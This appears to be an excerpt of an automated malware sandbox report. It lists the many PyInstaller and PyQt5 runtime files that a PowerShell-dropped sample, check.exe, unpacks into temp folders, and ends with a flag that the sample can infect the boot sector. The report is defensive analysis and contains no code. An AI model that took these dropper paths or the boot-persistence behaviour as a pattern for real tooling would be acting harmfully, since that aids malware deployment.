Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\platforms\qwebgl.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\QtWidgets.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\charset_normalizer\md__mypyc.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\Qt5Core.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qwbmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qgif.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\libGLESv2.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\libcrypto-3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\opengl32sw.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\charset_normalizer\md__mypyc.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\python313.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Qml.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qwbmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\MSVCP140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\d3dcompiler_47.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\MSVCP140_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\python3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Svg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Network.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\QtCore.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\libEGL.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\platforms\qwindows.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qsvg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qtga.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\psutil\_psutil_windows.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qsvg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\Qt5Quick.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\MSVCP140_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\platforms\qoffscreen.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\libffi-8.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\libffi-8.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qjpeg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\sip.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\Qt5Network.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\python313.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\libssl-3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\VCRUNTIME140_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qwebp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\_wmi.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\Qt5WebSockets.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\MSVCP140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\MSVCP140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\Qt5Widgets.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qicns.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qico.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\libssl-3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qtga.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\_queue.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\Qt5Qml.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\libGLESv2.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\QtWidgets.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\opengl32sw.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\sip.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\python313.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Quick.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\QtGui.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qjpeg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\platforms\qoffscreen.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\psutil\_psutil_windows.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qicns.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\VCRUNTIME140_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\python3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Widgets.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5WebSockets.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qtiff.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qtiff.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5DBus.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\Qt5Network.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\Qt5Svg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\libssl-3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qicns.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\libEGL.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\QtCore.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\libffi-8.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\_wmi.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\charset_normalizer\md.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qwebp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qico.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\charset_normalizer\md.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qtga.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\platforms\qminimal.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\Qt5DBus.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\_queue.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qsvg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\iconengines\qsvgicon.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\_queue.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\psutil\_psutil_windows.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Core.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qtiff.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\Qt5Quick.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\Qt5Widgets.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\platforms\qminimal.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Gui.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\Qt5Qml.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\Qt5Core.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\platforms\qwebgl.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qgif.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\QtGui.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\libGLESv2.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\platforms\qwindows.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\libcrypto-3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qwbmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\d3dcompiler_47.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qgif.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\Qt5WebSockets.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\libEGL.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\QtGui.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\charset_normalizer\md.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\iconengines\qsvgicon.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\Qt5Gui.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qwebp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\iconengines\qsvgicon.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\Qt5Svg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qjpeg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\QtWidgets.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\python3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\platforms\qminimal.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\Qt5QmlModels.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\MSVCP140_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\VCRUNTIME140_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\VCRUNTIME140_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\Qt5DBus.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\d3dcompiler_47.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI55962\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI41282\_wmi.pyd	Jump to dropped file

Boot Survival

Contains functionality to infect the boot sector

